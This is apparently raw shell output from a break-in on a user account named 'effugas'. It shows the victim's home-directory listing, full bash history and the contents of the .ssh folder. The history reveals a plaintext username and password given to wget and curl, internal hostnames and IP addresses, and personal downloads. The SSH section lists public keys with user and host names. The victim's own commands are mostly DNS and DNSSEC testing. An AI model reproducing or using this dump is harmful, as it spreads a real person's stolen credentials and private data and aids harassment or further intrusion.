/usr/home/effugas/mail/RouteSec -rw-r--r-- 1 effugas wheel 1352443 Mar 1 2008 Secret of Mana.zip -rw------- 1 effugas wheel 144765683 Jul 26 2006 Sent -rw------- 1 effugas wheel 68609225 Jul 25 2005 Sent Items -rw-r--r-- 1 effugas wheel 0 Sep 25 2005 Spam -rw-r--r-- 1 effugas wheel 55823056 Aug 10 2006 Trash drwxr-xr-x 2 effugas wheel 512 Oct 28 2005 ack drwxr-xr-x 2 effugas wheel 1024 Aug 8 2007 airhook-2 -rw-r--r-- 1 effugas wheel 28282 Apr 14 2003 airhook-2.tar.gz drwxr-xr-x 2 effugas wheel 512 Sep 8 2008 ap drwxr-xr-x 2 effugas wheel 1536 Feb 21 2008 arse -rw-r--r-- 1 effugas wheel 614 Jan 19 2005 authorized_keys -rw-r--r-- 1 effugas wheel 8048 Jan 23 2006 av2.txt -rw-r--r-- 1 effugas wheel 2641 Oct 6 2006 back.pem drwxr-xr-x 2 effugas wheel 1024 Jul 25 2006 bin -rw-r--r-- 1 effugas wheel 1801 Feb 23 2008 boing_seq.txt -rwx------ 1 effugas wheel 214576 Jul 25 2006 bplex_0_dev-src.gz -rw-r--r-- 1 effugas wheel 1662 Sep 8 2008 browserRedirect?url=itms%3A%2F%2Fax.phobos.apple.com.edgesuite.net%2FWebObjects%2FMZStore.woa%2Fwa%2FviewGenre%3Fid%3D35 drwxr-xr-x 2 effugas wheel 512 Jun 11 2006 ca drwxr-xr-x 2 effugas wheel 512 Sep 24 2006 cl drwxr-xr-x 60 effugas wheel 4096 Jul 6 2008 content drwxrwxrwx 2 effugas wheel 512 Jul 8 2008 db -rw-r--r-- 1 effugas wheel 963360 Sep 26 2005 db.dump -rw------- 1 effugas wheel 2416 Apr 27 13:07 dead.letter -rw-r--r-- 1 effugas wheel 718 Feb 22 2008 del.txt -rw-r--r-- 1 effugas wheel 4196 Feb 23 2008 del_seq.txt -rw-r--r-- 1 effugas wheel 4188 Feb 23 2008 del_ts.txt -rw-r--r-- 1 effugas wheel 10980 Sep 19 2006 dell_ssl2.txt -rw------- 1 effugas wheel 815104 Feb 11 2008 dig.core drwxr-xr-x 2 effugas wheel 1024 Jul 30 2006 dissoc-0.1 -rw-r--r-- 1 effugas wheel 51652 Jul 2 2001 dissoc-0.1.tar.gz -rw-r--r-- 1 effugas wheel 193 Oct 4 2006 distinfo -rwx------ 1 effugas wheel 7211132 Mar 15 2008 dk2_cli.pcap drwxr-xr-x 33 effugas wheel 3584 Jul 13 11:47 dl -rw-r--r-- 1 effugas wheel 4338 Mar 30 2005 dns.cap -rw-r--r-- 1 effugas wheel 4338 Apr 13 15:23 dns.pcap -rwx------ 1 effugas wheel 3793316 Jun 15 2006 domain_login_esp.cap drwxr-xr-x 2 effugas wheel 512 Dec 23 2008 dprint -rw-r--r-- 1 effugas wheel 615112704 Nov 5 2006 en_winxp_pro_with_sp2.iso -rw-r--r-- 1 effugas wheel 1967 Feb 23 2008 fark_seq.txt -rw-r--r-- 1 effugas wheel 1984 Feb 23 2008 fark_ts.txt drwxr-xr-x 2 effugas wheel 512 Oct 4 2006 files -rw------- 1 effugas jb 209744 Sep 25 2005 filtered -rw------- 1 effugas wheel 37106364 Sep 26 2005 fire_inbox -rw-r--r-- 1 effugas wheel 7385211 Oct 28 2005 foo.pgp -rw-r--r-- 1 effugas wheel 10485784 Jun 19 2006 foo.xml -rw-r--r-- 1 effugas wheel 12920 Feb 22 2008 g_seq.txt -rw-r--r-- 1 effugas wheel 12848 Feb 22 2008 g_ts.txt -rw------- 1 effugas jb 2909341 Jan 12 2006 gah drwxr-xr-x 9 effugas wheel 1536 Aug 11 2005 gaim-1.5.0 -rw-r--r-- 1 effugas wheel 6123237 Aug 11 2005 gaim-1.5.0.tar.bz2 -rw------- 1 effugas wheel 7999488 Sep 29 2005 gaim.core -rw-r--r-- 1 effugas wheel 1588 Jan 1 2006 ghet_ip.c drwxrwxr-x 2 effugas wheel 512 Sep 30 2005 ghetto drwxr-xr-x 2 effugas wheel 512 Sep 25 2005 gml -rwxr-xr-x 1 effugas wheel 3395 Jun 17 2004 gml.py drwxr-xr-x 2 effugas wheel 512 Aug 23 2007 haxedit -rwx------ 1 effugas wheel 40960 Aug 27 2007 haxedit.tgz -rwxr-xr-x 1 effugas wheel 5312 Apr 6 14:20 heh -rw-r--r-- 1 effugas wheel 168 Apr 6 14:20 heh.cpp drwxr-xr-x 2 effugas wheel 512 Apr 26 00:32 hmm -rw-r--r-- 1 effugas wheel 1636602 Oct 28 2005 hmm.txt -rw-r--r-- 1 effugas wheel 2200 Jan 21 2008 hoho.txt -rw-r--r-- 1 effugas wheel 15748938 Nov 24 2007 huh_shai.gz drwxr-xr-x 5 effugas wheel 512 Jan 24 2006 imgSeek-0.8.6 -rw-r--r-- 1 effugas wheel 396056 Nov 14 2006 imgSeek-0.8.6.tar.bz2 -rw-r--r-- 1 effugas wheel 618624 Aug 12 2007 imsi-capture_phonecrypt_secured.wav -rw-r--r-- 1 effugas wheel 74086 Jun 10 2006 index.php -rw-r--r-- 1 effugas wheel 36115 Oct 5 2006 index.txt -rwxr-xr-x 1 effugas wheel 2739 Nov 7 2005 info_bot.pl drwxr-xr-x 2 effugas wheel 133120 Dec 5 2006 is -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif.1 -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif.2 -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif.3 -rw-r--r-- 1 effugas wheel 764567 Nov 26 2007 jm.zone drwxr-xr-x 2 effugas wheel 512 Oct 8 2007 johnny -rw-r--r-- 1 effugas wheel 0 Sep 8 2008 known_hosts drwxr-xr-x 2 effugas wheel 512 Mar 8 2005 lib drwxr-xr-x 7 effugas wheel 1024 Aug 29 2008 libspf2-1.2.5 -rw-r--r-- 1 effugas wheel 517945 Feb 23 2005 libspf2-1.2.5.tar.gz -rwx------ 1 effugas wheel 3548321 Jan 21 2008 local3.log -rw-r--r-- 1 effugas wheel 166676 Feb 22 2008 log.bin -rw-r--r-- 1 effugas wheel 22722620 Dec 8 2005 log.txt -rw-r--r-- 1 effugas wheel 10763 Mar 29 18:48 login drwxr-xr-x 3 effugas wheel 2048 Dec 5 2006 m -rw-r--r-- 1 effugas wheel 182 Feb 28 2006 mae.txt drwxr-xr-x 3 effugas wheel 512 Jul 17 11:39 mail drwxrwxrwx 2 effugas jb 512 Dec 31 2005 mail_oh -rw-r--r-- 1 effugas wheel 2765 Jun 1 2008 mangle.c -rw------- 1 effugas jb 7385213 Oct 28 2005 mater.pgp -rw-r--r-- 1 effugas wheel 66 Oct 28 2005 mater.pgp.2 -rwxr-xr-x 1 effugas wheel 4961 Apr 14 17:31 mem -rw-r--r-- 1 effugas wheel 231 Apr 14 17:31 mem.c -rw-r--r-- 1 effugas wheel 1002 Jul 6 2008 migrate.pl drwxr-xr-x 2 effugas wheel 512 Jan 5 2008 mov drwxr-xr-x 7 effugas wheel 512 Sep 29 2005 msn drwxr-xr-x 2 effugas wheel 512 Sep 29 2005 msn-bot -rw-r--r-- 1 effugas wheel 16973 Jul 16 2003 msn-bot.zip drwxr-xr-x 2 effugas wheel 512 Jan 13 2006 music drwxr-xr-x 4 effugas wheel 4163072 Feb 2 2007 mypix -rw-r--r-- 1 effugas wheel 7096 Feb 22 2008 mys.txt -rw-r--r-- 1 effugas wheel 11102 Feb 23 2008 mys_seq.txt -rw-r--r-- 1 effugas wheel 1032 Feb 23 2008 mys_ts.txt drwxr-xr-x 7 effugas wheel 1024 Feb 13 2007 netcat-0.7.1 -rwx------ 1 effugas wheel 398872 Feb 13 2007 netcat-0.7.1.tar.gz drwxr-xr-x 2 effugas wheel 512 Jun 5 2007 new -rw-r--r-- 1 effugas wheel 0 Jun 11 2006 newcert.pem -rw-r--r-- 1 effugas wheel 1180 Jun 11 2006 newreq.cer -rw-r--r-- 1 effugas wheel 1180 Jun 11 2006 newreq.pem -rwxr-xr-x 1 effugas wheel 10371 Nov 15 2006 nomde.pl drwxr-xr-x 5 effugas wheel 512 Sep 17 2004 ophcrack_1_0a -rw-r--r-- 1 effugas wheel 5114862 Sep 17 2004 ophcrack_1_0a.zip -rw-r--r-- 1 effugas wheel 139283 Jan 10 2006 out.txt -rw------- 1 effugas jb 138418 Sep 28 2005 penn -rw------- 1 root wheel 999878656 Nov 25 2008 perl5.8.8.core -rw------- 1 effugas wheel 91009024 Jan 26 17:29 pine.core drwxr-xr-x 3 effugas wheel 58368 Feb 2 2007 pix drwxr-xr-x 5 effugas wheel 512 Jan 26 2007 pix2 -rw-r--r-- 1 effugas wheel 554 Oct 4 2006 pkg-descr -rw-r--r-- 1 effugas wheel 853 Oct 4 2006 pkg-plist drwxr-xr-x 3 effugas wheel 512 Jun 5 2007 s4 -rw-r--r-- 1 effugas wheel 378156 Mar 14 2006 scapy.py drwxr-xr-x 8 effugas wheel 2560 Oct 8 2006 screen-4.0.2 -rw-r--r-- 1 effugas wheel 840519 Jan 27 2004 screen-4.0.2.tar.gz drwxr-xr-x 3 effugas wheel 512 Sep 27 2005 sdba -rwxr-xr-x 1 effugas wheel 486449 Jul 12 2006 sequitur_simple.exe drwxr-xr-x 2 effugas wheel 512 Feb 6 14:10 shmoo -rw-r--r-- 1 effugas wheel 387800 Feb 13 2007 socat-1.5.0.0.tar.gz -rw-r--r-- 1 effugas wheel 0 Dec 30 2005 spam_first drwxr-xr-x 2 effugas wheel 2560 Jul 25 2006 src -rw-r--r-- 1 effugas wheel 144 Sep 27 2005 subcheck.pl -rw-rw---- 1 effugas mail 148812841 Dec 30 2005 superchunk_1 -rw-rw---- 1 effugas mail 7489304 Dec 31 2005 superchunk_2 drwxr-xr-x 2 effugas wheel 512 Apr 20 19:32 swap -rw-r--r-- 1 effugas wheel 117 Jul 6 2008 tcheck.pl -rw-r--r-- 1 effugas wheel 1025 Feb 22 2008 test.txt drwxr-xr-x 2 effugas wheel 512 Apr 3 15:48 tmp -rw-r--r-- 1 root wheel 221202 Nov 25 2008 tmp1 -rw-r--r-- 1 root wheel 225530 Nov 25 2008 tmp2 drwxr-xr-x 2 effugas wheel 512 Nov 11 2008 tor-audit drwxr-xr-x 5 effugas wheel 1536 Jun 23 2007 trunk -rwxr-xr-x 1 effugas wheel 7232 Feb 13 2007 udpfwd -rw-r--r-- 1 effugas wheel 3431 Feb 13 2007 udpfwd.c drwxr-xr-x 20 effugas wheel 1536 Jun 29 10:16 unbound-1.3.0 -rw-r--r-- 1 effugas wheel 4059848 Jun 11 04:00 unbound-latest.tar.gz -rw-r--r-- 1 effugas wheel 87 May 17 2007 url.txt drwxr-xr-x 2 effugas wheel 512 Sep 20 2005 walker-3.8 -rw-r--r-- 1 effugas wheel 18478 Sep 20 2005 walker-3.8.tar.gz -rwx------ 1 effugas wheel 24256 Jun 18 2006 webdav.txt -rwx------ 1 effugas wheel 21710 Jun 18 2006 webdav.xml drwxr-xr-x 2 effugas wheel 512 Nov 7 2005 wtf -rw-r--r-- 1 effugas wheel 92 May 30 2007 wtf.pl drwxr-xr-x 2 effugas wheel 1024 Jul 28 2006 xray -rw-r--r-- 1 effugas wheel 12840 Feb 23 2008 yahoo_seq.txt -rw-r--r-- 1 effugas wheel 13002 Feb 23 2008 yahoo_ts.txt %cat .bash_history ctorrent -h ctorrent Heroes_-_Season_3_\(Volume_Three_\[3\]___Villains_-_Complete\)_-_S03.4583677.TPB.torrent cd .. cd grab2 ls ctorrent 1483862 ls wget http://www.mininova.org/get/2072701 ctorrent 2072 ctorrent 2072701 rm -rf Family\ Guy\ Season\ 4/ wget http://www.mininova.org/get/2087297 ctorrent 2087297 pine pine pine pine pine pine pine pine pine pine pine pine pine cd ls -l ND* ls -l *doc cp Doxpara-NDT\ term\ sheet.doc /export/www/colo.doxpara.com/ pine pine pine cd heh ls cd hmm ls cd .. find . | grep -i txt ls find . | grep -i heh cd swap/ ls more heh.txt more heh.txt cd cd heh ls find . | grep -i heh cd swap cat heh.txt cd /export/www/colo.doxpara.com/ wget http://www.state.gov/documents/organization/79958.pdf screen -D -R screen -D -R ~# ~# screen -D -R screen -D -R screen D -R screen -D -R screen -D -R screen -D -R screen -D -R screen -D -R pine kjhkjhdkjshfksjdf pine sdfsdf whois doxdns1.com links http://www.google.com/url?sa=t&source=web&ct=res&cd=1&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FTriple_DES&ei=PiwmSqv8JqHYswPIm-SbBg&rct=j&q=3des&usg=AFQjCNGi3G2cND5EvYton6SvtELgpvoDag links 'http://www.google.com/url?sa=t&source=web&ct=res&cd=1&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FTriple_DES&ei=PiwmSqv8JqHYswPIm-SbBg&rct=j&q=3des&usg=AFQjCNGi3G2cND5EvYton6SvtELgpvoDag' lynx 'http://www.google.com/url?sa=t&source=web&ct=res&cd=1&url=http%3A%2F%2Fen.wikipedia.org%2Fwiki%2FTriple_DES&ei=PiwmSqv8JqHYswPIm-SbBg&rct=j&q=3des&usg=AFQjCNGi3G2cND5EvYton6SvtELgpvoDag' cd dl ls find . | grep -i ssl cd data ls ls -l ssl* more dell_ more dell_ssl.txt mysql mysql db mysql test ls cd .. find . | grep -i ssl dig @deluvian.doxpara.com _sshfp._autopop.mail.doxpara.com sshfp dig @deluvian.doxpara.com _sslfp._autopop.mail.doxpara.com cert dig @deluvian.doxpara.com _sslfp._autopop.mail.microsoft.com cert dig @deluvian.doxpara.com +dnssec _sshfp._autopop.mail.doxpara.com sshfp dig @deluvian.doxpara.com _sslfp._autopop.mail.microsoft.com cert dig @deluvian.doxpara.com dan.doxpara.com cert dig @deluvian.doxpara.com dan.doxpara.com cert +dnssec dig @deluvian.doxpara.com dan.doxpara.com cert +dnssec pine pine ~ fgfdgdfgdg cd /export/www/colo.doxpara.com/ ls vim etweet.pl vi etweet.pl screen -D -R nslookup -type=txt g.iranelection.toorrr.com nslookup -type=txt g.iranelection.toorrr.com nslookup -type=txt g.iranelection.toorrr.com nslookup -type=txt g.iranelection.toorrr.com nslookup -type=txt g.iranelection.toorrr.com nslookup -type=txt g.iranelection.toorrr.com nslookup -type=txt g.iranelection.toorrr.com 209.200.168.66 dig @209.200.168.66 g.iranelection.toorrr.com txt dig @209.200.168.66 g.iranelection.toorrr.com txt dig g.iranelection.toorrr.com txt dig g.iranelection.toorrr.com txt dig g.iranelection.toorrr.com txt dig g.iranelection.toorrr.com txt dig g.iranelection.toorrr.com txt dig g.iranelection.toorrr.com txt ping www.google.com ping www.failblog.com ping www.cnn.com ping www.metblogs.com netstat -an | grep -i 443 dig microsoft.com mx dig boingboing.net mx nc mx1.emailsrvr.com. 25 telnet mx1.emailsrvr.com 25 telnet mx1.emailsrvr.com 25 telnet mx1.emailsrvr.com 25 telnet mx1.emailsrvr.com 25 dig +short boingboing.net mx whois ohairan.com nc mail.ohairan.com nc mail.ohairan.com 25 nc mail.ohairan.com 25 irc BitchX whois 74.125.67.100 dig . dig . any dig A.ROOT-SERVERS.NET. wget http://www.unbound.net/downloads/unbound-latest.tar.gz tar xzvf unbound-latest.tar.gz cd unbound-1.3.0/ ./configure make gmake cat > sample.c gcc -I ./libunbound -L . -o sample sample.c gcc -I ./libunbound -L . -o sample sample.c -lunbound -lcrypto gcc -I ./libunbound -L . -o sample sample.c libunboundla -lcrypto gcc -I ./libunbound -L . -o sample sample.c libunbound.la -lcrypto gcc -I ./libunbound -L . -o sample sample.c libunbound.la -lcrypto gcc -I ./libunbound -L . -o sample sample.c -lunbound -lcrypto gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound -lcrypto ./sample fg vim sample.c vi sample.c cat > root.hints cat > root.keys ./sample gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound -lcrypto ./sample time ./sample dig +dnssec www.afilias.org fg vim sample.c vi sample.c gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound -lcrypto ./sample ./sample www.news.com ./sample www.fark.com ./sample www.dnssec.se fg ./sample www.dnssec.se vim sample.c vi sample.c gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound -lcrypto ./sample www.dnssec.se ./sample www.afilias.org ./sample c0.org.afilias-nst.info. ./sample dnssec.org ./sample 166.68.193.in-addr.arpa. ./sample www.whitehouse.gov ./sample www.highinberlin.de ./sample www.dnssec.se ./sample www.dnssec.se ./sample www.dnssec.se ./sample www.iis.se ./sample dotgov.dnsops.gov ./sample www.iana.org ./sample www.fark.com ./sample gov ./sample org ./sample org ./sample afilias.org ./sample dnssec.org ./sample org ./sample www.dynamicnetworkservices.com ./sample www.dnsops.gov ./sample version.dnssec.se cd wget http://josefsson.org/walker/releases/walker-3.8.tar.gz tar xzvf walker-3.8.tar.gz cd walker-3.8 ./walker ./walker dnssec.se ./walker se ./walker nonex.dnssec.se cd cd unbound- cd unbound-1.3.0/ ./sample nonex.dnssec.se ./sample www.stern.de ./sample www.anon-proxy.de ./sample de ./sample se ./sample gov ./sample usgs.gov ./sample gq ./sample mil dig +dnssec @204.61.216.37 foo dig +dnssec @204.61.216.37 foo.com dig +dnssec @204.61.216.37 coop dig +dnssec @204.61.216.37 cr dig +dnssec @204.61.216.37 gov ./sample gov dig +dnssec @204.61.216.37 gov dig +dnssec @204.61.216.37 org dig +dnssec @204.61.216.37 org dig +dnssec @204.61.216.37 B2.ORG.AFILIAS-NST.org. ./sample B2.ORG.AFILIAS-NST.org. dig @B0.ORG.AFILIAS-NST.org. dig +secure @B0.ORG.AFILIAS-NST.org. dig +dnssec @B0.ORG.AFILIAS-NST.org. dig +dnssec @B0.ORG.AFILIAS-NST.org. $B0.ORG.AFILIAS-NST.org dig +dnssec @B0.ORG.AFILIAS-NST.org. org dig +dnssec @B0.ORG.AFILIAS-NST.org. www.afilias.org ./configure --help ./configure --help | grep -i nsec find . | xargs grep nsec3 cd cd walker-3.8 ./walker ./walker www.dnssec.se ./walker dnssec.se ./walker se cd .. cd unbound- cd unbound-1.3.0/ ./sample 0-3.se. ./sample www.0-3.se. cd .. cd walker-3.8 ./walker gov ./walker de ./walker gov ./walker com ./walker org dig +dnssec +trace www.dnssec.se dig @209.200.168.67 foo.com dig +dnssec @209.200.168.67 foo.com dig +dnssec @209.200.168.67 foo.com dig +dnssec @209.200.168.67 foo.com dnskey cd sample cd unbound-1.3.0/ ls mkdir real mv root* real cat real/root.keys cat > root.keys cat real/root.hints vim root.hints vi root.hints ./sample foo.com ./sample foo.com ./sample www.cnn.com ./sample www.doxpara.com dig +dnssec @209.200.168.67 foo.com dig +dnssec @209.200.168.67 dnskey dig +dnssec @209.200.168.67 dnskey dig +dnssec @209.200.168.67 dnskey dig +dnssec @209.200.168.67 cnn.com dnskey date ntpdate ./sample www.doxpara.com ./sample www.doxpara.com ./sample www.doxpara.com dig @209.200.168.67 . dig @209.200.168.67 . dig @209.200.168.67 . dig @209.200.168.67 . dig @209.200.168.67 . dig @209.200.168.67 . dig @209.200.168.67 . ./sample www.doxpara.com find . | xargs grep verbose find . | xargs grep "root-hints" vim ./util/configlexer.lex vi ./util/configlexer.lex vim sample.c vi sample.c gcc -I ./libunbound -L . -o sample sample.c -lunbound -lcrypto gcc -I ./libunbound -L . -o sample sample.c -lunbound -lcrypto gcc -o sample sample.c -lunbound -lcrypto gcc -I ./libunbound -L /usr/local/lib -o sample sample.c -lunbound -lcrypto ./sample www.doxpara.com ./sample www.doxpara.com ./sample www.doxpara.com dig @209.200.168.67 dakadns. DNSKEY dig @209.200.168.67 dakadns. DNSKEY dig @209.200.168.67 dakadns. DNSKEY dig @209.200.168.67 dakadns. DNSKEY ./sample www.doxpara.com ./sample www.doxpara.com dig dnssec.se dnskey dig +dnssec dnssec.se dnskey dig +dnssec dnssec.se dnskey dig +dnssec se dig +trace +dnssec www.dnssec.se dig +trace +dnssec www.dnssec.se dnskey dig afilias.org dig afilias.org +trace dig afilias.org +trace dnskey dig +trace +dnssec www.dnssec.se dnskey dig +trace +dnssec dnssec.se dnskey drill ls find . | grep -i drill cd ldns-src ./drill/ cd drill/ ls make cd .. make gmake ls find . | grep -i drill ./configure drill make gmake make drill gmake drill ls drill cd drill/ ls gmake ./configure gmake ./drill ./drill ./drill www.dnssec.se ./drill www.dnssec.se -h ./drill +dnssec www.dnssec.se ./drill -j www.dnssec.se ./drill -h www.dnssec.se ./drill -D www.dnssec.se ./drill -T -D www.dnssec.se ./drill -T -D www.dnssec.se ./drill -T -D -h ./drill @209.200.168.67 -D www.cnn.com ./drill @209.200.168.67 -D www.cnn.com DNSKEY ./drill @209.200.168.67 -D www.cnn.com ./drill @209.200.168.67 -D -T www.cnn.com ./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys -D -T www.cnn.com ./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys -D -T www.cnn.com ./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys www.cnn.com ./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys www.cnn.com -D ./drill @209.200.168.67 -k ~/unbound-1.3.0/root.keys -DT www.cnn.com ./drill -h ./drill -r ~/unbound-1.3.0/root.hints 7 -k ~/unbound-1.3.0/root.keys -DT www.cnn.com ./drill -r ~/unbound-1.3.0/root.hints 7 -k ~/unbound-1.3.0/root.keys -DT www.cnn.com ./drill -r ~/unbound-1.3.0/root.hints 7 -k ~/unbound-1.3.0/root.keys -DT www.cnn.com ./drill -h cd .. cd .. drill drill -r root.hints drill -r root.hints drill -r root.hints cat root.hints drill -r root.hints drill -r ./root.hints drill drill -h drill -r ./root.hints -T drill -r ./root.hints -T www.cnn.com drill -r ./root.hints -DT www.cnn.com drill -r ./root.hints -k root.keys -DT www.cnn.com drill -r ./root.hints -k root.keys -DT www.cnn.com drill -r ./root.hints -k root.keys -DT www.cnn.com drill -r ./root.hints -k root.keys -DT www.cnn.com drill -r ./root.hints -k root.keys -DT www.cnn.com drill -r ./real/root.hints -k real/root.keys www.dnssec.se drill -r ./real/root.hints -k real/root.keys www.dnssec.se drill -r ./real/root.hints -k ./real/root.keys www.dnssec.se cat real/root.keys cd real/ ls cp root.keys root.keys.orig vim root.keys vi root.keys cd .. drill -r ./real/root.hints -k ./real/root.keys www.dnssec.se cd real/ ls cat root.keys cat root.keys | tr -d \n cat root.keys | tr -d '\n' cat root.keys | tr -d '\n' | tr -s ' ' cat root.keys | tr -d '\n' | tr -s ' ' > real ls mv real root.keys vim root.keys vi root.keys cd .. drill -r ./real/root.hints -k ./real/root.keys www.dnssec.se drill -DT -r ./real/root.hints -k ./real/root.keys www.dnssec.se drill -DT -r ./real/root.hints -k ./real/root.keys www.dnssec.se drill -DT -r ./real/root.hints -k ./real/root.keys www.dnssec.se ls cat root.keys cat root.hints drill -DT -r root.hints -k ./real/root.keys www.dnssec.se drill -DT -r root.hints -k root.keys www.dnssec.se drill -DT -r root.hints -k root.keys www.dnssec.se drill -DT -r root.hints -k root.keys www.dnssec.se drill -DT -r root.hints -k root.keys www.dnssec.se drill -DT -r root.hints -k root.keys $RANDOM.doxpara.com drill -DT -r root.hints -k root.keys $RANDOM.doxpara.com dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET dig @209.200.168.67 F.ROOT-SERVERS.NET drill -DT -r root.hints -k root.keys $RANDOM.doxpara.com drill -DT -r root.hints -k root.keys $RANDOM.doxpara.com cat real/root.hints dig @208.77.188.32 L.ROOT-SERVERS.NET dig @208.77.188.32 L.ROOT-SERVERS.NET +dnssec dig @208.77.188.32 L.ROOT-SERVERS.NET +dnssec dig @208.77.188.32 L.ROOT-SERVERS.NET +dnssec dig @208.77.188.32 L.ROOT-SERVERS.NET +dnssec ls cd real/ ls ../sample www.dnssec.se ../sample www.dnssec.se 2> /dev/null ../sample www.dnssec.se 2> /dev/null ../sample www.dnssec.se 2> /dev/null dig a.root-servers.net cd cd dl wget http://www.watters.ws/rpms/roms/snes/Secret%20of%20Mana.zip cd dl mkdir game cd game wget -r -l1 http://www.watters.ws/rpms/roms/snes/ airhook cd airhook-2 ./airproxy -l 12000 -o 22 ./airproxy -l 12000 -o 22 ./airproxy -l 12022 -o 22 cd dl mkdir new mkdir n cd n cat > goget.txt wget --no-check-certificate --user=effugas.2 --password=fuck.2 -i goget.txt for i in `cat goget.txt`; do curl -k -u effugas.2:fuck.2 -O $i; done ls rm *avi ls wget --no-check-certificate --user=effugas2 --password=fuck.2 -i goget.txt pwd fg ls rm * cd /export/www/colo.doxpara.com/ cat > dns.txt ls -l dns.txt pine cd mv Nothing\ but\ Net\ -\ 2009\ Internet\ Investment\ Guide.pdf /export/www/colo.doxpara.com/net.pdf more netcat-0.7.1 cd /export/www/colo. cd /export/www/colo.doxpara.com/ more net.pdf %ls -la .ssh/ total 36 drwxr-xr-x 2 effugas wheel 512 Nov 9 2005 . drwx------ 68 effugas wheel 5120 Jul 17 11:43 .. -rw-r--r-- 1 effugas wheel 1222 Sep 8 2008 authorized_keys -rw-r--r-- 1 effugas wheel 1211 Sep 8 2008 authorized_keys2 -rw-r--r-- 1 effugas wheel 4749 Sep 8 2008 known_hosts %cat .ssh/* ssh-dss AAAAB3NzaC1kc3MAAACBAIbMIL3650aavJ1W89+NQUvWUAIEvzp7nUK35UB5AfZom8Efa0pgh3rj3ps gXk9dB19grUuulKkBKLsv4sWv0MOkPd0NLOYOjAQhoyo4vqS7r/1gI57P7RmF7BUJzVduh8ommtbpkD rf7pP2GtvviBRJwGoHdpZecc+bx5/Ew7PFAAAAFQD7DzAkyFmYb3aH3I/BawF5Y5u3BwAAAIB1uyDMv hFZshTZJHieXRY8ymCUJTArb6yYRSQL3f0pUyBNud9ojc0wGCEUrenho0FU7I3CFqNh+eDhvPr7luVr xHqiKtCu37fiG+HfBU/KiRoJI7UtdHK9Mi89XBi02Zh4X+sFoX1pubVH5VMOmtQuDn9gJi9L11l0x2k HUL/VhQAAAIBBcIEN9AVvKd3/bndPAtesLVLY5KXtvYHMdtN3iyj6Us4ei/TAyA9g/4aNHWeSz2irZm KBOZqVbzy27aeFiU+A1T//wHqtsBvlCQyWkLbw8ndy/fMg/CtK1ErvsedsT5RSmnT1GXEzuNQvEi19R nR+WhQHes8FuX+FE6u/nVDomw== kaminsky at avaya-8j8h5dc15 ssh-dss AAAAB3NzaC1kc3MAAACBAJ+WvdG7iu2bzetu1ot9692qeXuhjqcEWUrTq2uwUR/X2EiclfYdBcjeUMZ 4uu9sQDpbSYZ2VNu97YYzM+2Z8VdDnW2Bt+Tpan49eUcttgIPvCAibPTJHqrwTyeJE+lPrqq11qnFYW nR/wVRt0Ouf579e8CS0GJVvIuC/oSE4QEPAAAAFQDOEApeEzWHJkYYeQQvxfvxNL9NAQAAAIBYy0k3Y 8U021sjqwMeqe+xp0rLqV+6giXzE5ccI9G61UxhA7wFQluXpHobwgnKbIgwnGLymWp5DhDmgv0dNzl+ cgnKgNg+9hXhQ5k3jLbI1sSBzwb1HD70i7kvvMhMXcihGyhdZ7BBqKfIohdPodynKwwO3tebwJlE9rl cSWMTvAAAAIBgoyTRPIb1arSy20xzZO548c07v18PSdxMWCjL1urwqDl5zZq+SUrB7B2L5xPr6m6nz7 sTgYFI0ZnxvXJg0PilDAbYcggVcOPrdvcKpJQx9tcn1lPeRYgpCzB5iyqwD/tBhEp0wv4wbvFHgVDZk rIS6NFKvcitBxsO9TfdbPkGaw== dan at v-dakami-styro ssh-dss AAAAB3NzaC1kc3MAAACBAMfpCLXVIDpATuWVjdFYCdrnkgwzkc8yplVF7TFUzFcxFr1Vi/+lKFe2TaD AnUYpTnZpSPvsEPe+s2SWEOS8EX1gM5iT4Z/8ThOXKtEi1fTkGBsqKy1A4YeesooRlKW54MrCDMX2C5 l+VTgMMgqO9Dp86YM+lNpYhh+HKz+gHnixAAAAFQCV7/+zWBfgoVXjUheV5kbDCHSC5wAAAIEAlMHWJ ymTMAW8Du/fRgZVUTM1XFqQqwWiX28Ir3oYnzszoM/tNUMyVTisS6Fd+xgehC2t2FcGRiipwbatydhT 19pX5dndoTGZEpSOnTVv9EcmMGb0bjQ7YEIOdCk2dPsOjRwnwwX/LolbYKhb8e0lX1Y9r9f8KPVnVXG 6Wpu0TywAAACBAJDNmXtTPRu603+utnGUv98vuyii/eQeV7lk2TgxY12mjfcdWSK3bGP9afSatSGRPj qUCJW9SWAvCD5xe5pSlUrz3nv7Gh2ahUZWV7DCGoPSgrb3eC5AHcyQ+q+f9NrY623nanBoZkkTQjIrA shFrIGqD10RCQwKM47PkmE34qY3 root at deluvian ssh-dss AAAAB3NzaC1kc3MAAACBAJ+WvdG7iu2bzetu1ot9692qeXuhjqcEWUrTq2uwUR/X2EiclfYdBcjeUMZ 4uu9sQDpbSYZ2VNu97YYzM+2Z8VdDnW2Bt+Tpan49eUcttgIPvCAibPTJHqrwTyeJE+lPrqq11qnFYW nR/wVRt0Ouf579e8CS0GJVvIuC/oSE4QEPAAAAFQDOEApeEzWHJkYYeQQvxfvxNL9NAQAAAIBYy0k3Y 8U021sjqwMeqe+xp0rLqV+6giXzE5ccI9G61UxhA7wFQluXpHobwgnKbIgwnGLymWp5DhDmgv0dNzl+ 